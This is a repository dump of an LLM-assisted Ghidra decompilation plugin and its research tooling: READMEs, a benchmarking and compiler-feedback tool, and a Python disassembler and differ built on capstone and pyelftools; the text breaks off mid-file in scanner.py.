├── LICENSE ├── README.md ├── benchmark ├── README.md ├── benchmark.py └── unixcoder.py ├── compiler ├── README.md ├── binexport.py ├── compiler-star.py ├── decompetition_disassembler │ ├── README.md │ ├── binary │ │ ├── __init__.py │ │ ├── mapper.py │ │ ├── reader.py │ │ ├── renderer.py │ │ └── scanner.py │ ├── bindings.py │ ├── differ.py │ ├── disassembler.py │ └── requirements.txt ├── pseudoexport.py └── unixcoder.py ├── docs ├── GhidraGUI.md └── OpenAI_Queries.md ├── eval ├── README.md ├── c_corpus │ ├── disasm │ │ ├── baby_c_main_2021.txt │ │ ├── demesne_main_2021.txt │ │ ├── dublin_main_2021.txt │ │ ├── leipzig_main_2021.txt │ │ ├── malware_payload_2021.txt │ │ ├── rotterdam_reed_2021.txt │ │ └── winkey_check_2021.txt │ ├── prompts │ │ ├── baby_c_main_2021.txt │ │ ├── demesne_main_2021.txt │ │ ├── dublin_main_2021.txt │ │ ├── leipzig_main_2021.txt │ │ ├── malware_payload_2021.txt │ │ ├── rotterdam_reed_2021.txt │ │ └── winkey_check_2021.txt │ └── source │ │ ├── baby_c_main_2021.c │ │ ├── demesne_main_2021.c │ │ ├── dublin_main_2021.c │ │ ├── leipzig_main_2021.c │ │ ├── malware_payload_2021.c │ │ ├── rotterdam_reed_2021.c │ │ └── winkey_check_2021.c ├── cpp_corpus │ ├── disasm │ │ ├── baby_cpp_main_2021.txt │ │ ├── blaise_main_2021.txt │ │ ├── rumrum_main_2021.txt │ │ ├── rumrum_produce_2021.txt │ │ └── yurlungur_mutate_2021.txt │ ├── prompts │ │ ├── baby_cpp_main_2021.txt │ │ ├── blaise_main_2021.txt │ │ ├── rumrum_main_2021.txt │ │ ├── rumrum_produce_2021.txt │ │ └── yurlungur_mutate_2021.txt │ └── source │ │ ├── baby_cpp_main_2021.cpp │ │ ├── blaise_main_2021.cpp │ │ ├── rumrum_main_2021.cpp │ │ ├── rumrum_produce_2021.cpp │ │ └── yurlungur_mutate_2021.cpp ├── eval.py ├── extract_type.py ├── go_corpus │ ├── disasm │ │ ├── baby_go_main_2021.txt │ │ ├── cartree_main_2021.txt │ │ ├── goalie_main_2021.txt │ │ ├── oracle_predict_2021.txt │ │ └── scaffold_main_2021.txt │ ├── prompts │ │ ├── baby_go_main_2021.txt │ │ ├── cartree_main_2021.txt │ │ ├── 
goalie_main_2021.txt │ │ ├── oracle_predict_2021.txt │ │ └── scaffold_main_2021.txt │ └── source │ │ ├── baby_go_main_2021.go │ │ ├── cartree_main_2021.go │ │ ├── goalie_main_2021.go │ │ ├── oracle_predict_2021.go │ │ └── scaffold_main_2021.go └── rust_corpus │ ├── disasm │ ├── baby_rust_step_2021.txt │ ├── braintrust_new_2021.txt │ ├── endeavour_enco_2021.txt │ └── parasite_deco_2021.txt │ ├── prompts │ ├── baby_rust_step_2021.txt │ ├── braintrust_new_2021.txt │ ├── endeavour_enco_2021.txt │ └── parasite_deco_2021.txt │ └── source │ ├── baby_rust_step_2021.rs │ ├── braintrust_new_2021.rs │ ├── endeavour_enco_2021.rs │ └── parasite_deco_2021.rs ├── finetune ├── README.md ├── data │ ├── README.md │ ├── c_corpus │ │ └── README.md │ ├── cpp_corpus │ │ └── README.md │ ├── go_corpus │ │ └── README.md │ └── rust_corpus │ │ └── README.md ├── deepseek.yml ├── extract_c.py ├── extract_cpp.py ├── extract_go.py ├── extract_rust.py └── merge.py ├── ghidraRevAI.py ├── split ├── README.md ├── function_split.py └── unixcoder.py └── tests ├── README.md ├── graph ├── graph.cpp ├── http ├── http.go ├── lambda ├── lambda.cpp ├── linked ├── linked.cpp ├── map ├── map.rs ├── multi └── multi.rs /README.md: -------------------------------------------------------------------------------- 1 | This project was built by Akshat Parikh during the Trail of Bits 2022 Winter Internship. The project is provided as is. Contact opensource@trailofbits.com if you'd like to use this project. 2 | 3 | # Codex Decompiler 4 | Codex Decompiler is a Ghidra plugin that utilizes OpenAI's models to improve the decompilation and reverse engineering experience. It currently has the ability to take the disassembly from Ghidra and then feed it to OpenAI's models to decompile the code. The plugin also offers several other features to perform on the decompiled code such as finding vulnerabilities using OpenAI, generating a description using OpenAI, or decompiling the Ghidra pseudocode. 
Below is an example of the plugin running in Ghidra, along with the available features. 5 | 6 | ![pluginDisplay](https://user-images.githubusercontent.com/68412398/212231570-7047ab53-92d1-49d0-a773-720e94d0fb48.png) 7 | 8 | The plugin supports both the regular OpenAI API and the Azure OpenAI API. It can be configured to use different models. 9 | 10 | Tested on Ghidra 10.3.1 with Java versions 11.0, 17.0, and 20.0. 11 | 12 | ## Setup 13 | 1. Download the repository and move the `ghidraRevAI.py` file into the `ghidra_scripts` directory, which by default is at `$USER_HOME/ghidra_scripts`. 14 | 2. Set the environment variable `OPENAI_API_KEY` to your OpenAI/Azure OpenAI API key (or just set it in the popup in the next steps). 15 | 3. Open Ghidra and import the binary to analyze. 16 | 4. Open the "Script Manager" window in the "Window" menu. 17 | 5. Select the script named `ghidraRevAI.py`, check the checkbox, and click the Play/Run Script button to run the script. 18 | 6. A series of popups will appear to help configure the plugin. 19 | 7. Each time you open Ghidra, run the `ghidraRevAI.py` script again. The plugin options will be shown in the "Edit > Tool Options" window, under the "Codex-Decompiler" section. 20 | 21 | ## Usage 22 | 1. To use the plugin, go to any function inside of the Listing window and press Ctrl+J (Cmd+J on macOS). 23 | 2. A new window should pop up; its taskbar lists the operations that can be performed on the pseudocode. 24 | Here is an example of the taskbar. 25 | 26 | ![taskbar](https://user-images.githubusercontent.com/68412398/212239760-677c0483-386a-4de6-9ab2-ea7747a34a6a.png) 27 | 28 | Note: all of the output from OpenAI (pseudocode) is cached in the `ghidra_scripts` directory under the subfolder `output`. This avoids unnecessary calls to the API, which can be costly. 
29 | ### List of Operations: 30 | - ![context](https://user-images.githubusercontent.com/68412398/212240054-dcad8e91-48bc-4555-9602-01c4708ed69e.png) Generate a description for the pseudocode displayed 31 | - ![edit](https://user-images.githubusercontent.com/68412398/212240118-23597a8e-1d83-445b-a948-f38cd802476b.png) View, edit, and resubmit the last prompt sent to OpenAI 32 | - ![save](https://user-images.githubusercontent.com/68412398/212240172-fb3261ef-4745-4945-9d6f-e214f5fd04bb.png) Save the changes in the pseudocode editor to the file output 33 | - ![refresh](https://user-images.githubusercontent.com/68412398/212240232-2d527eb3-0ab8-4601-8ac4-82c3eb5a22a6.png) Decompile the disassembly again 34 | - ![find](https://user-images.githubusercontent.com/68412398/212240274-cf901029-3fe3-4d0d-9fd0-888e67b7eb5f.png) Find vulnerabilities in the pseudocode 35 | - ![gear](https://user-images.githubusercontent.com/68412398/212240354-078b2676-e701-47c8-afb2-f5a6ecda6140.png) Decompile the pseudocode that Ghidra generated 36 | 37 | ## Limitations 38 | For any of the aforementioned features, the output from OpenAI can be faulty and inconsistent. Thus, before doing anything with the generated pseudocode or other data, make sure that it is correct. 39 | ## References 40 | 1. https://ghidra.re/ghidra_docs/api/ 41 | 2. https://www.javaprogrammingforums.com/java-swing-tutorials/915-how-add-line-numbers-your-jtextarea.html 42 | ## Acknowledgments/Contributions 43 | I would like to acknowledge everyone at Trail of Bits for helping me through this project and providing feedback. I thoroughly enjoyed my experience with the company and creating this tool. 
44 | -------------------------------------------------------------------------------- /benchmark/README.md: -------------------------------------------------------------------------------- 1 | # Decompilation Benchmarking Tool 2 | This folder contains all the code for the decompilation benchmarking tool, which tests the accuracy of a given LLM in decompilation tasks. 3 | This tool can be used with the dataset provided in the eval folder. 4 | Accuracy can be measured in two modes: one scores the output by parsing the AST of the decompilation, and the other computes the cosine similarity of the output. 5 | ## Usage 6 | The tool can be used as follows: 7 | ```bash 8 | python3 benchmark.py -p PATH_TO_PROMPTS -s PATH_TO_SOURCE_FILES -l LANGUAGE -m MODE 9 | ``` 10 | The mode command line argument takes one of two values: (0: AST parsing) and (1: Code Similarity). In the benchmark.py file, there is a function named generate_llm_response which can be modified to work with any LLM. 11 | -------------------------------------------------------------------------------- /compiler/README.md: -------------------------------------------------------------------------------- 1 | # Compiler Augmented Generation Tool 2 | This folder contains all the code for the Compiler Augmented Generation tool, which leverages different feedback mechanisms to guide an LLM in decompilation tasks. 3 | The tool supports five feedback modes: bindiff (BinDiff output), disdiff (Disassembly Diff from Decompetition), objdump (Disassembly Diff from Objdump), ghidra (Ghidra Pseudocode Diff), and ghidra_eval (Ghidra Pseudocode Scoring). 4 | ## compiler-star.py 5 | This file contains the main tool. 
An example command for this tool is as follows: 6 | ```bash 7 | python3 compiler-star.py -p ./baby_cpp_main_2021.txt -b ../cpp.out -c clang++ -m ghidra -k ./ghidra_10.4_PUBLIC/support/analyzeHeadless -s ./ghidra_proj/ -o ./trailofbits/output -f '-g -O0' -u main -l cpp 8 | ``` 9 | This example command is running the tool on the baby_cpp_main_2021 prompt and binary from the eval folder. It is also using the ghidra feedback mode. 10 | The full list and description of all the command line arguments of this tool is given below: 11 | ```bash 12 | usage: Compiler Augmented LLM Decompilation [-h] -p PROMPT -b BINARY -o OUTPUT -c COMPILER [-f FLAGS] -m MODE [-i ITERATIONS] [-k HEADLESS] 13 | [-s PROJ] [-q STUB] -u FUNC -l LANGUAGE [-z ACCURACY_MODE] [-a SOURCE_FILE] 14 | 15 | This program uses chain of thought reasoning with LLMs and feedback from the compiler to improve decompilation results. 16 | 17 | options: 18 | -h, --help show this help message and exit 19 | -p PROMPT, --prompt PROMPT 20 | Path to initial disassembly prompt. 21 | -b BINARY, --binary BINARY 22 | Path to initial binary file. 23 | -o OUTPUT, --output OUTPUT 24 | Path to output directory. 25 | -c COMPILER, --compiler COMPILER 26 | Compiler binary to compile the files. 27 | -f FLAGS, --flags FLAGS 28 | Compiler flags. 29 | -m MODE, --mode MODE Feedback mode: (bindiff/disdiff/objdump/ghidra/ghidra-eval) 30 | -i ITERATIONS, --iterations ITERATIONS 31 | Number of iterations in chain of thought. 32 | -k HEADLESS, --headless HEADLESS 33 | Path to Ghidra headless binary (analyzeHeadless). 34 | -s PROJ, --proj PROJ Path to Ghidra project directory. 35 | -q STUB, --stub STUB Path to stub source file used in compiling. 36 | -u FUNC, --func FUNC Name of the function to be decompiled. 37 | -l LANGUAGE, --language LANGUAGE 38 | Language of initial binary file (C, CPP, Go, Rust). 
39 | -z ACCURACY_MODE, --accuracy_mode ACCURACY_MODE 40 | Mode of Accuracy Measurement (0: AST parsing) (1: Code Similarity) 41 | -a SOURCE_FILE, --source_file SOURCE_FILE 42 | Path to source file used for accuracy measurements. 43 | ``` 44 | This file also has a function named generate_llm_response which can be easily modified to work with any LLM. Currently, it uses GPT-4. 45 | ## binexport.py 46 | This file is a Ghidra headless script that allows you to export the BinExport file for any given binary. It is used in bindiff mode in the main tool. 47 | ## pseudoexport.py 48 | This file is a Ghidra headless script that allows you to export the Ghidra pseudocode of a function from a binary. It is used in ghidra and ghidra_eval modes in the main tool. 49 | ## decompetition_disassembler 50 | This folder is a clone of the [Disassembler Differ](https://github.com/decompetition/disassembler/tree/master) from the Decompetition team. It is used in the disdiff mode in the main tool. 51 | 52 | ## Demos 53 | Here are links to a couple of demos showing the tool in action. 
54 | [Demo Showing LLM Fixing Compiler Errors](https://drive.google.com/file/d/1nqabvyky-_deZMT28ArDqjxYYw1U2d4Q/view?usp=sharing) 55 | [Demo Showing LLM Improving Decompilation](https://drive.google.com/file/d/1OhZh4RzZXkRNrxouDxtXqqe_EIHjfwYz/view?usp=sharing) 56 | -------------------------------------------------------------------------------- /compiler/binexport.py: -------------------------------------------------------------------------------- 1 | # This ghidra headless script allows you to get the binexport of the current program 2 | from com.google.security.binexport import BinExportExporter 3 | from java.io import File 4 | import os 5 | 6 | addr_set = currentProgram.getMemory() 7 | program_name = currentProgram.getName() 8 | output_path = os.environ['BINEXPORT_OUTPUT_PATH'] 9 | full_path = os.path.join(output_path, program_name + ".BinExport") 10 | name = File(full_path) 11 | exporter = BinExportExporter() 12 | exporter.export(name, currentProgram, addr_set, monitor) 13 | -------------------------------------------------------------------------------- /compiler/decompetition_disassembler/README.md: -------------------------------------------------------------------------------- 1 | # Disassembler & Differ 2 | 3 | This is a refactor of the disassembler and differ used in Decompetition 2020. 4 | 5 | 6 | ## The Disassembler 7 | 8 | You can use the disassembler via the command line: 9 | 10 | ```sh 11 | python3 disassembler.py -l language path/to/binary.out funcname ... 12 | ``` 13 | 14 | This will produce plain text output. Add the `-y` option to get the YAML output 15 | used by the differ. 
This has the following format: 16 | 17 | ```yaml 18 | functions: 19 | (funcname): 20 | asm: | # disassembly text for this function 21 | nop 22 | nop 23 | nop 24 | map: # source code line number for each instruction, if available 25 | - 42 26 | - null 27 | - 108 28 | ``` 29 | 30 | The source map will only be present in YAML mode, and even then only when passed 31 | the `-s` option to enable it. 32 | 33 | 34 | ## The Differ 35 | 36 | You can also use the differ via the command line: 37 | 38 | ```sh 39 | python3 differ.py path/to/candidate.yml path/to/target.yml 40 | ``` 41 | 42 | This will produce YAML output with the following format: 43 | 44 | ```yaml 45 | functions: 46 | (funcname): 47 | delta: 48 | - 1 # number of lines appearing only in the candidate 49 | - 2 # number of lines appearing in both disassemblies 50 | - 3 # number of lines appearing only in the target 51 | - 6 # total number of lines in this function 52 | hunks: 53 | - - 1 # hunk type (-1 = candidate only; 0 = shared; 1 = target only) 54 | - | # disassembly text for this hunk 55 | nop 56 | nop 57 | - 2 # total number of lines in this hunk 58 | - ... 59 | srcmap: # source code line numbers from the candidate 60 | - null 61 | - 69 62 | - ... 63 | ``` 64 | 65 | ## The Binary Class 66 | 67 | Most of the work happens in the disassembler, which has been spread over several 68 | files for readability. If you're interested in specific functionality, here's 69 | where to look: 70 | 71 | - `binary/__init__.py` contains the `Binary` class, but not much happens here. 72 | - `binary/mapper.py` has functions for mapping assembly instructions to source code lines. 73 | - `binary/reader.py` has functions for reading string constants out of the binary. 74 | - `binary/renderer.py` takes care of generating the disassembly text. 75 | - `binary/scanner.py` finds symbols and names in the binary. 
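To make the differ's `delta` layout (candidate-only, shared, target-only, total) more concrete, here is a small sketch that computes the same four counts with the standard-library `difflib`. It is a stand-in for illustration only: the differ in this folder uses `diff_match_patch`, and both `line_delta` and the `similarity` score are hypothetical names that do not appear in the repository.

```python
import difflib

def line_delta(candidate, target):
    """Count candidate-only, shared, and target-only lines, plus their total."""
    cand = candidate.splitlines()
    targ = target.splitlines()
    delta = [0, 0, 0, 0]
    matcher = difflib.SequenceMatcher(a=cand, b=targ, autojunk=False)
    for tag, i1, i2, j1, j2 in matcher.get_opcodes():
        if tag == "equal":
            delta[1] += i2 - i1      # lines appearing in both disassemblies
        else:
            delta[0] += i2 - i1      # lines appearing only in the candidate
            delta[2] += j2 - j1      # lines appearing only in the target
    delta[3] = delta[0] + delta[1] + delta[2]
    return delta

def similarity(delta):
    """Assumed score: the fraction of all lines that both sides share."""
    return delta[1] / delta[3] if delta[3] else 1.0
```

A ratio like `similarity` is one possible way to turn a delta into a single number for ranking candidates; it is not necessarily the score used by the main tool.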
76 | -------------------------------------------------------------------------------- /compiler/decompetition_disassembler/binary/__init__.py: -------------------------------------------------------------------------------- 1 | import capstone 2 | import fnmatch 3 | import re 4 | 5 | from elftools.elf.elffile import ELFFile 6 | 7 | from .mapper import Mapper 8 | from .reader import Reader 9 | from .renderer import Renderer 10 | from .scanner import Scanner 11 | 12 | # Regex for removing annoying Rust hashes: 13 | DERUST = re.compile(r'17h[0-9a-f]{16}E\b') 14 | 15 | 16 | class Binary: 17 | def __init__(self, path, language, arch=capstone.CS_ARCH_X86, mode=capstone.CS_MODE_64): 18 | self.file = open(path, 'rb') 19 | self.elf = ELFFile(self.file) 20 | self.cap = capstone.Cs(arch, mode) 21 | self.cap.detail = True 22 | 23 | self.language = language 24 | self.scanner = Scanner(self) 25 | self.mapper = Mapper(self) 26 | self.reader = Reader(self) 27 | self.renderer = Renderer(self) 28 | 29 | def disassemble(self, patterns, srcmap=True): 30 | result = {} 31 | 32 | for function in self.functions: 33 | fname = function.name 34 | for pattern in patterns: 35 | if fnmatch.fnmatchcase(fname, pattern): 36 | d, a = self.renderer.render_function(fname) 37 | if self.language == 'rust': 38 | d = [re.sub(DERUST, 'E', i) for i in d] 39 | fname = re.sub(DERUST, 'E', fname) 40 | if d and d[-1] != '': 41 | d.append('') 42 | 43 | output = {'asm': '\n'.join(d)} 44 | if srcmap: 45 | output['map'] = self.get_source_lines(a) 46 | result[fname] = output 47 | 48 | return result 49 | 50 | @property 51 | def functions(self): 52 | return self.scanner.functions 53 | 54 | def get_source_lines(self, addrs): 55 | return self.mapper.get_source_lines(addrs) 56 | 57 | @property 58 | def plt(self): 59 | return self.scanner.plt 60 | 61 | def read_string(self, addr): 62 | return self.reader.read_string(addr) 63 | 64 | @property 65 | def sections(self): 66 | return self.scanner.sections 67 | 68 | @property 
69 | def symbols(self): 70 | return self.scanner.symbols 71 | -------------------------------------------------------------------------------- /compiler/decompetition_disassembler/binary/mapper.py: -------------------------------------------------------------------------------- 1 | import functools 2 | import intervaltree 3 | 4 | # The Mapper class handles mapping instruction 5 | # addresses to source code lines. It reads this 6 | # information out of the debug info as needed. 7 | 8 | class Mapper: 9 | def __init__(self, binary): 10 | self.binary = binary 11 | self.elf = binary.elf 12 | 13 | def get_source_line(self, address): 14 | """Map a single instruction address to a line number""" 15 | if address is None: 16 | return None 17 | matches = self.source_map[address] 18 | if len(matches) == 1: 19 | return next(iter(matches)).data 20 | # sys.stderr.write('Multiple source map lines!?\n') 21 | 22 | def get_source_lines(self, addresses): 23 | """Map a list of instruction addresses to a list of line numbers""" 24 | return list(map(self.get_source_line, addresses)) 25 | 26 | @functools.cached_property 27 | def source_map(self): 28 | index = intervaltree.IntervalTree() 29 | dinfo = self.elf.get_dwarf_info() 30 | 31 | def get_cu_die(cu): 32 | for die in cu.iter_DIEs(): 33 | if die.tag == 'DW_TAG_compile_unit': 34 | return die 35 | 36 | for cu in dinfo.iter_CUs(): 37 | # Go includes a huge amount of extra debug info. It's slow. Skip it. 
38 | if self.binary.language == 'go': 39 | die = get_cu_die(cu) 40 | if die.attributes['DW_AT_name'].value != b'main': 41 | continue 42 | 43 | lineprog = dinfo.line_program_for_CU(cu) 44 | prevstate = None 45 | if lineprog is None: 46 | continue 47 | for entry in lineprog.get_entries(): 48 | if entry.state is None: 49 | continue 50 | if entry.state.end_sequence: 51 | prevstate = None 52 | continue 53 | if prevstate: 54 | a = prevstate.address 55 | z = entry.state.address 56 | if a == z: 57 | z += 1 58 | index[a:z] = prevstate.line 59 | prevstate = entry.state 60 | return index 61 | -------------------------------------------------------------------------------- /compiler/decompetition_disassembler/binary/reader.py: -------------------------------------------------------------------------------- 1 | import struct 2 | 3 | # The Reader class handles reading constants 4 | # (typically strings) out of the binary. 5 | 6 | class Reader: 7 | def __init__(self, binary): 8 | self.binary = binary 9 | self.elf = binary.elf 10 | 11 | def read_bytes(self, addr, size): 12 | """Read raw data from the binary""" 13 | stream = self.elf.stream 14 | offsets = list(self.elf.address_offsets(addr)) 15 | if len(offsets) != 1: 16 | return None 17 | stream.seek(offsets[0]) 18 | return stream.read(size) 19 | 20 | def read_string(self, addr, size=32): 21 | """Try to intelligently load a string constant""" 22 | if self.binary.language == 'c': 23 | return self.read_string_data(addr, size) 24 | 25 | elif self.binary.language == 'cpp': 26 | return self.read_string_data(addr, size) 27 | 28 | elif self.binary.language == 'go': 29 | _, _, string = self.read_string_struct(addr) 30 | if string and len(string) > 1: 31 | return string 32 | string = self.read_string_data(addr, size) 33 | if string and len(string) > 1: 34 | return string 35 | 36 | elif self.binary.language == 'rust': 37 | ptr, size, string = self.read_string_struct(addr) 38 | # The format {} is replaced by a space and the string after the 
format 39 | # is stored as a separate "struct str" at addr + 16. 40 | if self.read_bytes(ptr + size, 1) == b' ': 41 | _, _, suffix = self.read_string_struct(addr + 16) 42 | if string and suffix: 43 | return string + '{}' + suffix 44 | return string or self.read_string_data(addr, size) 45 | 46 | elif self.binary.language == 'swift': 47 | string = self.read_string_data(addr, size) 48 | if string and len(string) > 1: 49 | return string 50 | 51 | def read_string_data(self, addr, size, cstring=True): 52 | """Read UTF-8 character data from the binary""" 53 | if not addr or not size: 54 | return None 55 | 56 | mem = self.read_bytes(addr, min(32, size)) 57 | if not mem: 58 | return None 59 | if cstring: 60 | mem = mem.split(b'\x00')[0] 61 | 62 | try: 63 | mem = mem.decode('utf-8') 64 | except UnicodeDecodeError: 65 | return None 66 | 67 | if len(mem) > 29: 68 | mem = mem[:29] + '...' 69 | return mem 70 | 71 | def read_string_struct(self, addr): 72 | """Read a typical string struct (including data) from the binary""" 73 | ptr = self.read_uint64(addr) 74 | size = self.read_uint64(addr + 8) 75 | string = self.read_string_data(ptr, size) 76 | return ptr, size, string 77 | 78 | def read_uint64(self, addr): 79 | """Read a little-endian UInt64 from the binary""" 80 | mem = self.read_bytes(addr, 8) 81 | if not mem: 82 | return None 83 | return struct.unpack('<Q', mem)[0] 84 | -------------------------------------------------------------------------------- /compiler/decompetition_disassembler/binary/renderer.py: -------------------------------------------------------------------------------- 1 | import capstone 2 | import json 3 | 4 | # NOTE: this header was reconstructed; the signature and defaults of `hext` 5 | # are inferred from its body and call sites in this file. 6 | 7 | def hext(num, pos='', neg='-'): 8 | """Format a number as signed decimal (small values) or hex""" 9 | result = pos if num >= 0 else neg 10 | if -10 < num < 10: 11 | result += str(abs(num)) 12 | else: 13 | result += '0x%x' % abs(num) 14 | return result 15 | 16 | def is_terminal(instruction): 17 | """Returns whether or not an instruction redirects execution""" 18 | if instruction.mnemonic == 'jmp': 19 | return True 20 | if instruction.mnemonic == 'ud2': 21 | return True 22 | if capstone.x86.X86_GRP_RET in instruction.groups: 23 | return True 24 | if capstone.x86.X86_GRP_INT in instruction.groups: 25 | return True 26 | return False 27 | 28 | 29 | class Renderer: 30 | def __init__(self, binary): 31 | self.binary = binary 32 | self.elf = binary.elf 33 
| self.cap = binary.cap 34 | self.plt = binary.plt 35 | self.functions = binary.functions 36 | self.sections = binary.sections 37 | self.symbols = binary.symbols 38 | 39 | self.memory = {} 40 | 41 | def render(self, name): 42 | """Disassemble a function or section""" 43 | if name in self.functions: 44 | return self.render_function(name) 45 | elif name in self.sections: 46 | return self.render_section(name) 47 | else: 48 | raise Exception('Could not find target: %s' % name) 49 | 50 | def render_address(self, addr, names={}): 51 | """Get the human-friendly name for an address if there is one""" 52 | if addr in self.symbols: 53 | return self.symbols[addr].name 54 | if self.plt[addr]: 55 | return next(iter(self.plt[addr])).data 56 | if addr in self.sections: 57 | return self.sections[addr].name 58 | if addr in self.memory: 59 | return self.memory[addr] 60 | if addr in names: 61 | return names[addr] 62 | # return '0x%x' % addr 63 | return None 64 | 65 | def render_disassembly(self, data, addr): 66 | """Disassemble a block of machine instructions""" 67 | disasm = list(self.cap.disasm(data, addr)) 68 | leaders = set([addr]) 69 | blocks = {} 70 | 71 | # Hack to force local scoping of global names: 72 | self.memory = {} 73 | 74 | for i in disasm: 75 | if capstone.x86.X86_GRP_JUMP in i.groups: 76 | leaders.add(i.operands[0].value.imm) 77 | leaders.add(i.address + i.size) 78 | 79 | leaders = sorted(leaders) 80 | for baddr in leaders: 81 | if baddr in self.sections or baddr in self.symbols: 82 | continue 83 | blocks[baddr] = 'block' + str(len(blocks) + 1) 84 | 85 | d = [] # Textual Disassembly 86 | a = [] # Instruction Addresses 87 | 88 | for i in disasm: 89 | if i.address in self.symbols: 90 | d.append(self.symbols[i.address].name + ':') 91 | a.append(i.address) 92 | elif i.address in self.sections: 93 | d.append(self.sections[i.address].name + ':') 94 | a.append(i.address) 95 | elif i.address in blocks: 96 | d.append(blocks[i.address] + ':') 97 | a.append(i.address) 98 | 99 
| if i.mnemonic == 'nop': 100 | continue 101 | 102 | ops = ', '.join([self.render_operand(i, o, blocks) for o in i.operands]) 103 | d.append((' %-7s %s' % (i.mnemonic, ops)).rstrip()) 104 | a.append(i.address) 105 | 106 | if i.address >= leaders[-1] and is_terminal(i): 107 | break 108 | return d, a 109 | 110 | def render_function(self, name): 111 | """Disassemble a function by name or address""" 112 | func = self.functions[name] 113 | text = self.sections['.text'] 114 | a = func.range.start - text.addr 115 | z = func.range.stop - text.addr 116 | data = text.data()[a:z] 117 | return self.render_disassembly(data, func.addr) 118 | 119 | def render_operand(self, instruction, operand, names={}): 120 | """Generate a human-friendly representation for an assembly operand""" 121 | # Heavily based on the Capstone unit tests (in lieu of decent documentation): 122 | # https://github.com/aquynh/capstone/blob/next/bindings/python/test_x86.py#L206 123 | if operand.type == capstone.x86.X86_OP_REG: 124 | return instruction.reg_name(operand.reg) 125 | if operand.type == capstone.x86.X86_OP_IMM: 126 | if capstone.x86.X86_GRP_JUMP in instruction.groups or capstone.x86.X86_GRP_CALL in instruction.groups: 127 | name = self.render_address(operand.imm, names) 128 | if not name: 129 | name = 'mem' + str(len(self.memory) + 1) 130 | self.memory[operand.imm] = name 131 | return name 132 | return hext(operand.imm) 133 | if operand.type == capstone.x86.X86_OP_MEM: 134 | if operand.mem.segment == 0 and operand.mem.base == capstone.x86.X86_REG_RIP and operand.mem.index == 0: 135 | addr = instruction.address + instruction.size + operand.mem.disp 136 | name = self.render_address(addr, names) 137 | if not name: 138 | name = 'mem' + str(len(self.memory) + 1) 139 | self.memory[addr] = name 140 | string = self.binary.read_string(addr) 141 | if string: 142 | return '[' + name + ']; ' + json.dumps(string) 143 | else: 144 | return '[' + name + ']' 145 | result = '[' 146 | if operand.mem.segment != 0: 147 
| result = instruction.reg_name(operand.mem.segment) + ':[' 148 | if operand.mem.base != 0: 149 | result += instruction.reg_name(operand.mem.base) 150 | if operand.mem.index != 0: 151 | if not result.endswith('['): 152 | result += '+' 153 | result += instruction.reg_name(operand.mem.index) 154 | if operand.mem.scale != 1: 155 | result += ' * %d' % operand.mem.scale 156 | if operand.mem.disp != 0: 157 | if result.endswith('['): 158 | result += hext(operand.mem.disp) 159 | else: 160 | result += hext(operand.mem.disp, pos='+') 161 | return result + ']' 162 | 163 | def render_section(self, name): 164 | """Disassemble a section by name or address""" 165 | s = self.sections[name] 166 | return self.render_disassembly(s.data(), s.addr) 167 | -------------------------------------------------------------------------------- /compiler/decompetition_disassembler/binary/scanner.py: -------------------------------------------------------------------------------- 1 | import capstone 2 | 3 | from intervaltree import IntervalTree 4 | from elftools.elf.relocation import RelocationSection 5 | 6 | # The Scanner class handles finding named entries in an ELF binary, 7 | # specifically: sections, symbols, and functions. 
8 | 9 | def address(instruction, operand): 10 | """Calculate the absolute address referred to by an instruction""" 11 | # Heavily based on the Capstone unit tests (in lieu of decent documentation): 12 | # https://github.com/aquynh/capstone/blob/next/bindings/python/test_x86.py#L206 13 | if operand.type == capstone.x86.X86_OP_REG and operand.reg == capstone.x86.X86_REG_RIP: 14 | return instruction.address + instruction.size 15 | if operand.type == capstone.x86.X86_OP_IMM: 16 | if capstone.x86.X86_GRP_JUMP in instruction.groups or capstone.x86.X86_GRP_CALL in instruction.groups: 17 | return operand.imm 18 | if operand.type == capstone.x86.X86_OP_MEM: 19 | if operand.mem.segment == 0 and operand.mem.base == capstone.x86.X86_REG_RIP and operand.mem.index == 0: 20 | return instruction.address + instruction.size + operand.mem.disp 21 | return None 22 | 23 | 24 | class Function: 25 | """Internal representation of a function""" 26 | def __init__(self, symbol): 27 | self.name = symbol.name 28 | self.addr = symbol.addr 29 | self.range = None 30 | 31 | 32 | class MiniMap: 33 | """A helper class to serve as a multi-key map""" 34 | def __init__(self): 35 | self.data = [] 36 | self.map = {} 37 | 38 | def __contains__(self, item): 39 | return item in self.map 40 | 41 | def __iter__(self): 42 | return iter(self.data) 43 | 44 | def __getitem__(self, key): 45 | return self.map[key] 46 | 47 | def add(self, value, *keys): 48 | for key in keys: 49 | self.map[key] = value 50 | self.data.append(value) 51 | 52 | def get(self, key, default=None): 53 | return self.map.get(key, default) 54 | 55 | 56 | class Scanner: 57 | def __init__(self, binary): 58 | self.elf = binary.elf 59 | self.cap = binary.cap 60 | 61 | self.sections = MiniMap() 62 | self.scan_sections() 63 | 64 | self.symbols = MiniMap() 65 | self.plt = IntervalTree() 66 | self.scan_symbols() 67 | 68 | self.functions = MiniMap() 69 | self.scan_functions() 70 | 71 | def scan_functions(self): 72 | """Collect all local function 
symbols""" 73 | functions = [] 74 | text = self.sections['.text'] 75 | 76 | for symbol in self.symbols: 77 | if symbol['st_info']['type'] == 'STT_FUNC': 78 | if symbol.addr in text.range: 79 | f = Function(symbol) 80 | self.functions.add(f, f.name, f.addr) 81 | functions.append(f) 82 | 83 | functions.sort(key=lambda f: f.addr) 84 | for i in range(1, len(functions)): 85 | # Assume that all functions are contiguous... 86 | functions[i-1].range = range(functions[i-1].addr, functions[i].addr) 87 | # And assume that the last function ends the .text section... 88 | functions[-1].range = range(functions[-1].addr, text.range.stop) 89 | 90 | def scan_plt(self): 91 | """Get symbols for any functions called through the .plt""" 92 | section = self.sections.get('.plt') 93 | if not section: return 94 | 95 | prev = section.addr 96 | for instruction in self.cap.disasm(section.data(), section.addr): 97 | if capstone.x86.X86_GRP_JUMP in instruction.groups: 98 | addr = address(instruction, instruction.operands[0]) 99 | if addr != section.addr: 100 | symbol = self.symbols.get(addr) 101 | if symbol and symbol.name: 102 | addr = instruction.address + instruction.size 103 | self.plt[prev:addr] = symbol.name + '@plt' 104 | prev = instruction.address + instruction.size 105 | 106 | def scan_plt_sec(self): 107 | """Get symbols for any functions called through the .plt.sec""" 108 | section = self.sections.get('.plt.sec') 109 | if not section: return 110 | 111 | prev = section.addr 112 | for instruction in self.cap.disasm(section.data(), section.addr): 113 | if capstone.x86.X86_GRP_JUMP in instruction.groups: 114 | addr = address(instruction, instruction.operands[0]) 115 | symbol = self.symbols.get(addr) 116 | if symbol and symbol.name: 117 | addr = instruction.address + instruction.size 118 | self.plt[prev:addr] = 